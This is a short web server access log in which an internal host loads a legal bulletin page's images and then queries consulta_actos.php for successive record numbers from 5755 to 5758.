172.22.2.4 - - [19/Jul/2023:09:18:38 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [19/Jul/2023:09:18:38 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [19/Jul/2023:09:18:38 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [19/Jul/2023:09:18:38 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [19/Jul/2023:09:18:38 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [19/Jul/2023:09:18:39 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [19/Jul/2023:09:18:39 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [19/Jul/2023:09:18:39 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [19/Jul/2023:09:18:39 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [19/Jul/2023:09:18:39 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [19/Jul/2023:09:18:39 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [19/Jul/2023:09:18:39 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [19/Jul/2023:09:18:39 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [19/Jul/2023:09:18:39 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [19/Jul/2023:09:18:39 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
172.22.2.4 - - [19/Jul/2023:09:18:43 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=5755&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [19/Jul/2023:09:18:45 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=5756&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [19/Jul/2023:09:18:47 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=5757&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [19/Jul/2023:09:18:48 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=5758&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 626
